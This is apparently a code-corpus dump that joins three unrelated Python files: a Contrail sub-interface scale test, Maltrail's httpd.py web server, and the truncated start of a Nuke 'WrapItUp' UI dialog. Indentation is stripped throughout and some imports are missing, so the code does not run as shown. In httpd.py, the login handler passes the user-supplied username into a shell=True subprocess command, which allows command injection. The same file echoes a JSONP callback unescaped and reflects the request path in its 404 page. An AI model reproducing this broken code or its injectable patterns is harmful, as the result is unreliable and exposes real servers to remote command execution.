from port_fixture import PortFixture
from ipaddress import IPv4Network
from multiprocessing import Process
import os
class TestSubInterfaceScale(GenericTestBase):
@classmethod
def setUpClass(cls):
super(TestSubInterfaceScale, cls).setUpClass()
        # Deployment path can be overridden via the DEPLOYMENT_PATH environment variable.
cls.template_path = os.getenv('DEPLOYMENT_PATH',
'serial_scripts/scale/sub_interface/template')
cls.env = Environment(loader=FileSystemLoader(cls.template_path))
cls.num = 4094
cls.num_per_file = 50
cls.cidr = "97.27.0.0/16"
try:
cls.generate_network_objects()
except Exception as e:
cls.logger.error(e)
@classmethod
def tearDownClass(cls):
cls.port_stack.cleanUp()
cls.vsrx_stack.cleanUp()
super(TestSubInterfaceScale, cls).tearDownClass()
@classmethod
def vnc_check(cls):
        actual_vmis = cls.vnc_lib.virtual_machine_interface_read(
            id=cls.port_uuid).virtual_machine_interface_refs or []
        assert len(actual_vmis) == cls.num, \
            'Desired number of sub-interfaces is not equal to the actual number created'
@classmethod
def setup_port(cls):
cls.port_file = '{}/port.yaml'.format(cls.template_path)
with open(cls.port_file, 'r') as fd:
cls.port_template = yaml.load(fd, Loader=yaml.FullLoader)
cls.port_stack = HeatStackFixture(
connections=cls.connections,
stack_name=cls.connections.project_name+'_port_scale',
template=cls.port_template,
timeout_mins=15)
cls.port_stack.setUp()
op = cls.port_stack.heat_client_obj.stacks.get(
cls.port_stack.stack_name).outputs
cls.port_uuid = op[0]['output_value']
@classmethod
def setup_vsrx(cls):
cls.nova_h.get_image('vsrx')
cls.nova_h.get_flavor('contrail_flavor_2cpu')
vsrx_temp = cls.env.get_template("vsrx.yaml.j2")
cls.vsrx_file = '{}/vsrx.yaml'.format(cls.template_path)
with open(cls.vsrx_file, 'w') as f:
f.write(vsrx_temp.render(uuid=cls.port_uuid))
with open(cls.vsrx_file, 'r') as fd:
cls.vsrx_template = yaml.load(fd, Loader=yaml.FullLoader)
cls.vsrx_stack = HeatStackFixture(
connections=cls.connections,
stack_name=cls.connections.project_name+'_vsrx_scale',
template=cls.vsrx_template,
timeout_mins=15)
cls.vsrx_stack.setUp()
op = cls.vsrx_stack.heat_client_obj.stacks.get(
cls.vsrx_stack.stack_name).outputs
cls.vsrx_id = op[0]['output_value']
vsrx = VMFixture(connections=cls.connections,
uuid=cls.vsrx_id, image_name='vsrx')
vsrx.read()
vsrx.verify_on_setup()
@classmethod
def call_heat_stack_with_template(cls, sub_intf_file, sub_intf_temp, start_index, end_index):
with open(sub_intf_file, 'w') as f:
f.write(sub_intf_temp.render(start_index=start_index, end_index=end_index,
sub_intf_nets=cls.sub_intf_nets, sub_intf_masks=cls.sub_intf_masks, ips=cls.ips, uuid=cls.port_uuid))
with open(sub_intf_file, 'r') as fd:
sub_template = yaml.load(fd, Loader=yaml.FullLoader)
sub_stack = HeatStackFixture(connections=cls.connections, stack_name=cls.connections.project_name +
'_sub_scale{}'.format(start_index), template=sub_template, timeout_mins=120)
sub_stack.setUp()
return sub_stack
@classmethod
def setup_sub_intfs(cls):
sub_intf_temp = cls.env.get_template("sub_bgp.yaml.j2")
# Logic for number of files
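        # e.g. with num=4094 and num_per_file=50 this yields 81 full template
        # files of 50 sub-interfaces each plus one partial file with 44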
perfect_num = cls.num // cls.num_per_file
partial_num = cls.num % cls.num_per_file
def multiple_stacks(i):
start_index = i * cls.num_per_file
end_index = (i+1) * cls.num_per_file
sub_intf_file = '{}/sub_bgp_stack{}.yaml'.format(
cls.template_path, i)
sub_intf_stack = cls.call_heat_stack_with_template(
sub_intf_file, sub_intf_temp, start_index, end_index)
        # Launch one process per template file so the stacks are created in parallel
procs = []
for i in range(perfect_num):
proc = Process(target=multiple_stacks, args=(i,))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
# For the last partial file
if partial_num != 0:
start_index = perfect_num * cls.num_per_file
end_index = start_index + partial_num
sub_intf_file = '{}/sub_bgp_stack{}.yaml'.format(
cls.template_path, perfect_num)
sub_intf_stack = cls.call_heat_stack_with_template(
sub_intf_file, sub_intf_temp, start_index, end_index)
@classmethod
def generate_network_objects(cls):
cidr = IPv4Network(cls.cidr)
cls.ips = []
cls.neighbor1_list = []
cls.neighbor2_list = []
cls.sub_intf_nets = []
cls.sub_intf_masks = []
cls.sub_mask = 28
cls.local_as = 64500
for n, sn in enumerate(cidr.subnets(new_prefix=cls.sub_mask)):
if n == cls.num:
break
sub_intf_cidr = IPv4Network(sn)
sub_intf_net = str(sub_intf_cidr.network_address)
sub_intf_mask = sub_intf_cidr.prefixlen
cls.sub_intf_nets.append(sub_intf_net)
cls.sub_intf_masks.append(sub_intf_mask)
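            # Within each /28 subnet: index 0 is the network address (skipped),
            # .1 and .2 are stored as neighbor addresses for the template,
            # .3 is used as the sub-interface IP and the rest is unused.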
for i, ip in enumerate(sub_intf_cidr):
if i == 0:
continue
elif i == 1:
cls.neighbor1_list.append(ip)
elif i == 2:
cls.neighbor2_list.append(ip)
elif i == 3:
cls.ips.append(ip)
else:
break
@test.attr(type=['sub_intf_scale'])
@preposttest_wrapper
def test_sub_interface_scale(self):
'''
Description: Test to scale 4094 sub-interfaces and validate it
Test steps:
1. Create port
2. Create sub-interfaces for that port
3. Attach port to vsrx and validate it
4. Also validate number of sub-interfaces created through vnc api
Pass criteria: 4094 sub-interfaces should be present
Maintainer : [email protected]
'''
self.setup_port()
self.setup_sub_intfs()
self.setup_vsrx()
self.vnc_check()
|
httpd.py
|
#!/usr/bin/env python2
"""
Copyright (c) 2014-2019 Maltrail developers (https://github.com/stamparm/maltrail/)
See the file 'LICENSE' for copying permission
"""
import BaseHTTPServer
import cStringIO
import datetime
import httplib
import glob
import gzip
import hashlib
import io
import json
import mimetypes
import os
import re
import socket
import SocketServer
import subprocess
import threading
import time
import traceback
import urllib
import urlparse
from core.addr import addr_to_int
from core.addr import int_to_addr
from core.addr import make_mask
from core.attribdict import AttribDict
from core.common import get_regex
from core.common import ipcat_lookup
from core.common import worst_asns
from core.enums import HTTP_HEADER
from core.settings import config
from core.settings import CONTENT_EXTENSIONS_EXCLUSIONS
from core.settings import DATE_FORMAT
from core.settings import DISABLED_CONTENT_EXTENSIONS
from core.settings import DISPOSED_NONCES
from core.settings import HTML_DIR
from core.settings import HTTP_TIME_FORMAT
from core.settings import MAX_NOFILE
from core.settings import NAME
from core.settings import PING_RESPONSE
from core.settings import SERVER_HEADER
from core.settings import SESSION_COOKIE_NAME
from core.settings import SESSION_COOKIE_FLAG_SAMESITE
from core.settings import SESSION_EXPIRATION_HOURS
from core.settings import SESSION_ID_LENGTH
from core.settings import SESSIONS
from core.settings import UNAUTHORIZED_SLEEP_TIME
from core.settings import VERSION
try:
# Reference: https://bugs.python.org/issue7980
# Reference: http://code-trick.com/python-bug-attribute-error-_strptime/
import _strptime
except ImportError:
pass
try:
import resource
resource.setrlimit(resource.RLIMIT_NOFILE, (MAX_NOFILE, MAX_NOFILE))
except:
pass
def start_httpd(address=None, port=None, join=False, pem=None):
"""
Starts HTTP server
"""
class ThreadingServer(SocketServer.ThreadingMixIn, BaseHTTPServer.HTTPServer):
def server_bind(self):
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
BaseHTTPServer.HTTPServer.server_bind(self)
def finish_request(self, *args, **kwargs):
try:
BaseHTTPServer.HTTPServer.finish_request(self, *args, **kwargs)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class SSLThreadingServer(ThreadingServer):
def __init__(self, server_address, pem, HandlerClass):
import OpenSSL # python-openssl
ThreadingServer.__init__(self, server_address, HandlerClass)
ctx = OpenSSL.SSL.Context(OpenSSL.SSL.TLSv1_2_METHOD)
ctx.use_privatekey_file(pem)
ctx.use_certificate_file(pem)
self.socket = OpenSSL.SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
self.server_bind()
self.server_activate()
def shutdown_request(self, request):
try:
request.shutdown()
except:
if config.SHOW_DEBUG:
traceback.print_exc()
class ReqHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(self):
path, query = self.path.split('?', 1) if '?' in self.path else (self.path, "")
params = {}
content = None
skip = False
if hasattr(self, "data"):
params.update(urlparse.parse_qs(self.data))
if query:
params.update(urlparse.parse_qs(query))
for key in params:
if params[key]:
params[key] = params[key][-1]
if path == '/':
path = "index.html"
path = path.strip('/')
extension = os.path.splitext(path)[-1].lower()
if hasattr(self, "_%s" % path):
content = getattr(self, "_%s" % path)(params)
else:
path = path.replace('/', os.path.sep)
path = os.path.abspath(os.path.join(HTML_DIR, path)).strip()
if not os.path.isfile(path) and os.path.isfile("%s.html" % path):
path = "%s.html" % path
if any((config.IP_ALIASES,)) and self.path.split('?')[0] == "/js/main.js":
content = open(path, "rb").read()
content = re.sub(r"\bvar IP_ALIASES =.+", "var IP_ALIASES = {%s};" % ", ".join('"%s": "%s"' % (_.split(':', 1)[0].strip(), _.split(':', 1)[-1].strip()) for _ in config.IP_ALIASES), content)
self.send_response(httplib.OK)
elif ".." not in os.path.relpath(path, HTML_DIR) and os.path.isfile(path) and (extension not in DISABLED_CONTENT_EXTENSIONS or os.path.split(path)[-1] in CONTENT_EXTENSIONS_EXCLUSIONS):
mtime = time.gmtime(os.path.getmtime(path))
if_modified_since = self.headers.get(HTTP_HEADER.IF_MODIFIED_SINCE)
if if_modified_since and extension not in (".htm", ".html"):
if_modified_since = [_ for _ in if_modified_since.split(';') if _.upper().endswith("GMT")][0]
if time.mktime(mtime) <= time.mktime(time.strptime(if_modified_since, HTTP_TIME_FORMAT)):
self.send_response(httplib.NOT_MODIFIED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
skip = True
if not skip:
content = open(path, "rb").read()
last_modified = time.strftime(HTTP_TIME_FORMAT, mtime)
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, mimetypes.guess_type(path)[0] or "application/octet-stream")
self.send_header(HTTP_HEADER.LAST_MODIFIED, last_modified)
# For CSP policy directives see: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/
self.send_header(HTTP_HEADER.CONTENT_SECURITY_POLICY, "default-src 'self'; style-src 'self' 'unsafe-inline'; " +
"script-src 'self' 'unsafe-eval' https://stat.ripe.net; " +
"frame-src *; object-src 'none'; block-all-mixed-content;")
if extension not in (".htm", ".html"):
self.send_header(HTTP_HEADER.EXPIRES, "Sun, 17-Jan-2038 19:14:07 GMT") # Reference: http://blog.httpwatch.com/2007/12/10/two-simple-rules-for-http-caching/
self.send_header(HTTP_HEADER.CACHE_CONTROL, "max-age=3600, must-revalidate") # Reference: http://stackoverflow.com/a/5084555
else:
self.send_header(HTTP_HEADER.CACHE_CONTROL, "no-cache")
else:
self.send_response(httplib.NOT_FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
content = '<!DOCTYPE html><html lang="en"><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL %s was not found on this server.</p></body></html>' % self.path.split('?')[0]
if content is not None:
for match in re.finditer(r"<\!(\w+)\!>", content):
name = match.group(1)
_ = getattr(self, "_%s" % name.lower(), None)
if _:
content = self._format(content, **{ name: _() })
if "gzip" in self.headers.getheader(HTTP_HEADER.ACCEPT_ENCODING, ""):
self.send_header(HTTP_HEADER.CONTENT_ENCODING, "gzip")
_ = cStringIO.StringIO()
compress = gzip.GzipFile("", "w+b", 9, _)
compress._stream = _
compress.write(content)
compress.flush()
compress.close()
content = compress._stream.getvalue()
self.send_header(HTTP_HEADER.CONTENT_LENGTH, str(len(content)))
self.end_headers()
if content:
self.wfile.write(content)
self.wfile.flush()
self.wfile.close()
def do_POST(self):
length = self.headers.getheader(HTTP_HEADER.CONTENT_LENGTH)
data = self.rfile.read(int(length))
data = urllib.unquote_plus(data)
self.data = data
self.do_GET()
def get_session(self):
retval = None
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s\s*=\s*([^;]+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
if SESSIONS[session].client_ip != self.client_address[0]:
pass
elif SESSIONS[session].expiration > time.time():
retval = SESSIONS[session]
else:
del SESSIONS[session]
if retval is None and not config.USERS:
retval = AttribDict({"username": "?"})
return retval
def delete_session(self):
cookie = self.headers.get(HTTP_HEADER.COOKIE)
if cookie:
match = re.search(r"%s=(.+)" % SESSION_COOKIE_NAME, cookie)
if match:
session = match.group(1)
if session in SESSIONS:
del SESSIONS[session]
def version_string(self):
return SERVER_HEADER
def end_headers(self):
if not hasattr(self, "_headers_ended"):
BaseHTTPServer.BaseHTTPRequestHandler.end_headers(self)
self._headers_ended = True
def log_message(self, format, *args):
return
def finish(self):
try:
BaseHTTPServer.BaseHTTPRequestHandler.finish(self)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _version(self):
return VERSION
def _format(self, content, **params):
if content:
for key, value in params.items():
content = content.replace("<!%s!>" % key, value)
return content
def _login(self, params):
valid = False
if params.get("username") and params.get("hash") and params.get("nonce"):
if params.get("nonce") not in DISPOSED_NONCES:
DISPOSED_NONCES.add(params.get("nonce"))
for entry in (config.USERS or []):
entry = re.sub(r"\s", "", entry)
username, stored_hash, uid, netfilter = entry.split(':')
if username == params.get("username"):
try:
if params.get("hash") == hashlib.sha256(stored_hash.strip() + params.get("nonce")).hexdigest():
valid = True
break
except:
if config.SHOW_DEBUG:
traceback.print_exc()
if valid:
session_id = os.urandom(SESSION_ID_LENGTH).encode("hex")
expiration = time.time() + 3600 * SESSION_EXPIRATION_HOURS
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
cookie = "%s=%s; expires=%s; path=/; HttpOnly" % (SESSION_COOKIE_NAME, session_id, time.strftime(HTTP_TIME_FORMAT, time.gmtime(expiration)))
if config.USE_SSL:
cookie += "; Secure"
if SESSION_COOKIE_FLAG_SAMESITE:
cookie += "; SameSite=strict"
self.send_header(HTTP_HEADER.SET_COOKIE, cookie)
if netfilter in ("", '*', "::", "0.0.0.0/0"):
netfilters = None
else:
addresses = set()
netmasks = set()
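                    # A netfilter item may be a CIDR (prefixes of /16 or longer
                    # are expanded into individual addresses, shorter prefixes
                    # are kept as netmasks), a dash-separated range, or a
                    # single IPv4 address.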
for item in set(re.split(r"[;,]", netfilter)):
item = item.strip()
if '/' in item:
_ = item.split('/')[-1]
if _.isdigit() and int(_) >= 16:
lower = addr_to_int(item.split('/')[0])
mask = make_mask(int(_))
upper = lower | (0xffffffff ^ mask)
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
else:
netmasks.add(item)
elif '-' in item:
_ = item.split('-')
lower, upper = addr_to_int(_[0]), addr_to_int(_[1])
while lower <= upper:
addresses.add(int_to_addr(lower))
lower += 1
elif re.search(r"\d+\.\d+\.\d+\.\d+", item):
addresses.add(item)
netfilters = netmasks
if addresses:
netfilters.add(get_regex(addresses))
SESSIONS[session_id] = AttribDict({"username": username, "uid": uid, "netfilters": netfilters, "expiration": expiration, "client_ip": self.client_address[0]})
else:
time.sleep(UNAUTHORIZED_SLEEP_TIME)
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
content = "Login %s" % ("success" if valid else "failed")
if not subprocess.mswindows:
try:
subprocess.check_output("logger -p auth.info -t \"%s[%d]\" \"%s password for %s from %s port %s\"" % (NAME.lower(), os.getpid(), "Accepted" if valid else "Failed", params.get("username"), self.client_address[0], self.client_address[1]), stderr=subprocess.STDOUT, shell=True)
except Exception:
if config.SHOW_DEBUG:
traceback.print_exc()
return content
def _logout(self, params):
self.delete_session()
self.send_response(httplib.FOUND)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.LOCATION, "/")
def _whoami(self, params):
session = self.get_session()
username = session.username if session else ""
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return username
def _check_ip(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
try:
result_worst = worst_asns(params.get("address"))
if result_worst:
result_ipcat = result_worst
else:
_ = (ipcat_lookup(params.get("address")) or "").lower().split(' ')
result_ipcat = _[1] if _[0] == 'the' else _[0]
return ("%s" if not params.get("callback") else "%s(%%s)" % params.get("callback")) % json.dumps({"ipcat": result_ipcat, "worst_asns": str(result_worst is not None).lower()})
except:
if config.SHOW_DEBUG:
traceback.print_exc()
def _trails(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return open(config.TRAILS_FILE, "rb").read()
def _ping(self, params):
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
return PING_RESPONSE
def _events(self, params):
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
start, end, size, total = None, None, -1, None
content = None
log_exists = False
dates = params.get("date", "")
if ".." in dates:
pass
elif '_' not in dates:
try:
date = datetime.datetime.strptime(dates, "%Y-%m-%d").strftime("%Y-%m-%d")
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date)
if os.path.exists(event_log_path):
range_handle = open(event_log_path, "rb")
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
else:
logs_data = ""
date_interval = dates.split("_", 1)
try:
start_date = datetime.datetime.strptime(date_interval[0], "%Y-%m-%d").date()
end_date = datetime.datetime.strptime(date_interval[1], "%Y-%m-%d").date()
for i in xrange(int((end_date - start_date).days) + 1):
date = start_date + datetime.timedelta(i)
event_log_path = os.path.join(config.LOG_DIR, "%s.log" % date.strftime("%Y-%m-%d"))
if os.path.exists(event_log_path):
log_handle = open(event_log_path, "rb")
logs_data += log_handle.read()
log_handle.close()
range_handle = io.BytesIO(logs_data)
log_exists = True
except ValueError:
print "[!] invalid date format in request"
log_exists = False
if log_exists:
range_handle.seek(0, 2)
total = range_handle.tell()
range_handle.seek(0)
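                # Clients can fetch the log incrementally via HTTP Range
                # requests; parse the requested byte window here.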
if self.headers.get(HTTP_HEADER.RANGE):
match = re.search(r"bytes=(\d+)-(\d+)", self.headers[HTTP_HEADER.RANGE])
if match:
start, end = int(match.group(1)), int(match.group(2))
max_size = end - start + 1
end = min(total - 1, end)
size = end - start + 1
if start == 0 or not session.range_handle:
session.range_handle = range_handle
if session.netfilters is None:
session.range_handle.seek(start)
self.send_response(httplib.PARTIAL_CONTENT)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, total))
content = session.range_handle.read(size)
else:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
buffer, addresses, netmasks, regex = cStringIO.StringIO(), set(), [], ""
for netfilter in session.netfilters:
if not netfilter:
continue
if '/' in netfilter:
netmasks.append(netfilter)
elif re.search(r"\A[\d.]+\Z", netfilter):
addresses.add(netfilter)
elif '\.' in netfilter:
regex = r"\b(%s)\b" % netfilter
else:
print "[!] invalid network filter '%s'" % netfilter
return
for line in session.range_handle:
display = False
ip = None
if regex:
match = re.search(regex, line)
if match:
ip = match.group(1)
display = True
if not display and (addresses or netmasks):
for match in re.finditer(r"\b(\d+\.\d+\.\d+\.\d+)\b", line):
if not display:
ip = match.group(1)
else:
break
if ip in addresses:
display = True
break
elif netmasks:
for _ in netmasks:
prefix, mask = _.split('/')
if addr_to_int(ip) & make_mask(int(mask)) == addr_to_int(prefix):
addresses.add(ip)
display = True
break
if display:
if ",%s" % ip in line or "%s," % ip in line:
line = re.sub(r" ([\d.,]+,)?%s(,[\d.,]+)? " % re.escape(ip), " %s " % ip, line)
buffer.write(line)
if buffer.tell() >= max_size:
break
content = buffer.getvalue()
end = start + len(content) - 1
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes %d-%d/%d" % (start, end, end + 1 + max_size * (len(content) >= max_size)))
if len(content) < max_size:
session.range_handle.close()
session.range_handle = None
if size == -1:
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "text/plain")
self.end_headers()
with range_handle as f:
while True:
data = f.read(io.DEFAULT_BUFFER_SIZE)
if not data:
break
else:
self.wfile.write(data)
else:
self.send_response(httplib.OK) # instead of httplib.NO_CONTENT (compatibility reasons)
self.send_header(HTTP_HEADER.CONNECTION, "close")
if self.headers.get(HTTP_HEADER.RANGE):
self.send_header(HTTP_HEADER.CONTENT_RANGE, "bytes 0-0/0")
return content
def _counts(self, params):
counts = {}
session = self.get_session()
if session is None:
self.send_response(httplib.UNAUTHORIZED)
self.send_header(HTTP_HEADER.CONNECTION, "close")
return None
self.send_response(httplib.OK)
self.send_header(HTTP_HEADER.CONNECTION, "close")
self.send_header(HTTP_HEADER.CONTENT_TYPE, "application/json")
match = re.search(r"\d+\-\d+\-\d+", params.get("from", ""))
if match:
min_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
min_ = datetime.datetime.fromtimestamp(0)
match = re.search(r"\d+\-\d+\-\d+", params.get("to", ""))
if match:
max_ = datetime.datetime.strptime(match.group(0), DATE_FORMAT)
else:
max_ = datetime.datetime.now()
min_ = min_.replace(hour=0, minute=0, second=0, microsecond=0)
max_ = max_.replace(hour=23, minute=59, second=59, microsecond=999999)
for filepath in sorted(glob.glob(os.path.join(config.LOG_DIR, "*.log"))):
filename = os.path.basename(filepath)
if not re.search(r"\A\d{4}-\d{2}-\d{2}\.log\Z", filename):
continue
try:
current = datetime.datetime.strptime(os.path.splitext(filename)[0], DATE_FORMAT)
except:
if config.SHOW_DEBUG:
traceback.print_exc()
else:
if min_ <= current <= max_:
timestamp = int(time.mktime(current.timetuple()))
size = os.path.getsize(filepath)
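                        # Only the first DEFAULT_BUFFER_SIZE bytes are read; for
                        # larger files the event count is extrapolated from that
                        # sample and rounded to the nearest hundred.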
with open(filepath, "rb") as f:
content = f.read(io.DEFAULT_BUFFER_SIZE)
if size >= io.DEFAULT_BUFFER_SIZE:
total = 1.0 * content.count('\n') * size / io.DEFAULT_BUFFER_SIZE
counts[timestamp] = int(round(total / 100) * 100)
else:
counts[timestamp] = content.count('\n')
return json.dumps(counts)
class SSLReqHandler(ReqHandler):
def setup(self):
self.connection = self.request
self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
# IPv6 support
if ':' in (address or ""):
address = address.strip("[]")
BaseHTTPServer.HTTPServer.address_family = socket.AF_INET6
# Reference: https://github.com/squeaky-pl/zenchmarks/blob/master/vendor/twisted/internet/tcp.py
_AI_NUMERICSERV = getattr(socket, "AI_NUMERICSERV", 0)
_NUMERIC_ONLY = socket.AI_NUMERICHOST | _AI_NUMERICSERV
_address = socket.getaddrinfo(address, int(port) if str(port or "").isdigit() else 0, 0, 0, 0, _NUMERIC_ONLY)[0][4]
else:
_address = (address or '', int(port) if str(port or "").isdigit() else 0)
try:
if pem:
server = SSLThreadingServer(_address, pem, SSLReqHandler)
else:
server = ThreadingServer(_address, ReqHandler)
except Exception as ex:
if "Address already in use" in str(ex):
exit("[!] another instance already running")
elif "Name or service not known" in str(ex):
exit("[!] invalid configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
elif "Cannot assign requested address" in str(ex):
exit("[!] can't use configuration value for 'HTTP_ADDRESS' ('%s')" % config.HTTP_ADDRESS)
else:
raise
print "[i] starting HTTP%s server at 'http%s://%s:%d/'" % ('S' if pem else "", 's' if pem else "", server.server_address[0], server.server_address[1])
print "[o] running..."
if join:
server.serve_forever()
else:
thread = threading.Thread(target=server.serve_forever)
thread.daemon = True
thread.start()
|
WrapItUp.py
|
# Max van Leeuwen - maxvanleeuwen.com/WrapItUp
# WrapItUp - 1.9
#
# Collect all media, gizmos and files associated with a nuke script, and copy it all to a separate folder - along with a relinked duplicate of the nuke script.
WIU_Title = 'WrapItUp 1.9 - maxvanleeuwen.com'
WIU_Log = '[WrapItUp] '
# import PySide(2)
try:
# try importing PySide2
try:
import PySide2.QtCore as QtCore
import PySide2.QtGui as QtGui
import PySide2.QtWidgets as QtWidgets
# on error, try PySide (with QtGui imported as QtWidgets)
except Exception as e:
import PySide.QtCore as QtCore
import PySide.QtGui as QtGui
import PySide.QtGui as QtWidgets
# ignore if in python shell
except Exception as e:
pass
# EMBEDDED UI
class Ui_Dialog(object):
def setupUi(self, Dialog):
Dialog.setObjectName("Dialog")
Dialog.setWindowModality(QtCore.Qt.ApplicationModal)
Dialog.setEnabled(True)
Dialog.resize(897, 868)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Preferred)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(Dialog.sizePolicy().hasHeightForWidth())
Dialog.setSizePolicy(sizePolicy)
Dialog.setFocusPolicy(QtCore.Qt.StrongFocus)
Dialog.setWindowOpacity(1.0)
Dialog.setAutoFillBackground(False)
Dialog.setWindowFilePath("")
Dialog.setSizeGripEnabled(False)
Dialog.setModal(False)
self.ListCopyPaths = QtWidgets.QListWidget(Dialog)
self.ListCopyPaths.setGeometry(QtCore.QRect(20, 240, 421, 411))
self.ListCopyPaths.setAutoFillBackground(False)
self.ListCopyPaths.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListCopyPaths.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListCopyPaths.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.ListCopyPaths.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListCopyPaths.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListCopyPaths.setResizeMode(QtWidgets.QListView.Fixed)
self.ListCopyPaths.setObjectName("ListCopyPaths")
self.ListIgnorePaths = QtWidgets.QListWidget(Dialog)
self.ListIgnorePaths.setGeometry(QtCore.QRect(460, 240, 421, 411))
self.ListIgnorePaths.setVerticalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListIgnorePaths.setHorizontalScrollBarPolicy(QtCore.Qt.ScrollBarAlwaysOn)
self.ListIgnorePaths.setSelectionMode(QtWidgets.QAbstractItemView.ExtendedSelection)
self.ListIgnorePaths.setVerticalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListIgnorePaths.setHorizontalScrollMode(QtWidgets.QAbstractItemView.ScrollPerPixel)
self.ListIgnorePaths.setObjectName("ListIgnorePaths")
self.SendToIgnore = QtWidgets.QPushButton(Dialog)
self.SendToIgnore.setGeometry(QtCore.QRect(290, 660, 151, 23))
self.SendToIgnore.setAutoDefault(False)
self.SendToIgnore.setObjectName("SendToIgnore")
self.SendToCopy = QtWidgets.QPushButton(Dialog)
self.SendToCopy.setGeometry(QtCore.QRect(460, 660, 151, 23))
self.SendToCopy.setAutoDefault(False)
self.SendToCopy.setObjectName("SendToCopy")
self.PackedPath = QtWidgets.QLineEdit(Dialog)
self.PackedPath.setGeometry(QtCore.QRect(20, 40, 781, 20))
self.PackedPath.setText("")
self.PackedPath.setObjectName("PackedPath")
self.ChoosePackedPathButton = QtWidgets.QPushButton(Dialog)
self.ChoosePackedPathButton.setGeometry(QtCore.QRect(810, 39, 75, 23))
self.ChoosePackedPathButton.setAutoDefault(False)
self.ChoosePackedPathButton.setObjectName("ChoosePackedPathButton")
self.LCopy = QtWidgets.QLabel(Dialog)
self.LCopy.setGeometry(QtCore.QRect(30, 220, 47, 13))
self.LCopy.setObjectName("LCopy")
self.LIgnore = QtWidgets.QLabel(Dialog)
self.LIgnore.setGeometry(QtCore.QRect(470, 220, 47, 13))
self.LIgnore.setObjectName("LIgnore")
self.LCurrItemItemPath = QtWidgets.QLabel(Dialog)
self.LCurrItemItemPath.setGeometry(QtCore.QRect(20, 720, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LCurrItemItemPath.setFont(font)
self.LCurrItemItemPath.setObjectName("LCurrItemItemPath")
self.LPackedItemPath = QtWidgets.QLabel(Dialog)
self.LPackedItemPath.setGeometry(QtCore.QRect(20, 740, 131, 16))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.LPackedItemPath.setFont(font)
self.LPackedItemPath.setObjectName("LPackedItemPath")
self.CurrItemPath = QtWidgets.QLabel(Dialog)
self.CurrItemPath.setGeometry(QtCore.QRect(150, 720, 771, 16))
self.CurrItemPath.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.CurrItemPath.setObjectName("CurrItemPath")
self.PackedItemPath = QtWidgets.QLabel(Dialog)
self.PackedItemPath.setGeometry(QtCore.QRect(150, 740, 771, 16))
self.PackedItemPath.setTextInteractionFlags(QtCore.Qt.LinksAccessibleByMouse)
self.PackedItemPath.setObjectName("PackedItemPath")
self.LWebsite = QtWidgets.QLabel(Dialog)
self.LWebsite.setGeometry(QtCore.QRect(20, 830, 221, 16))
self.LWebsite.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
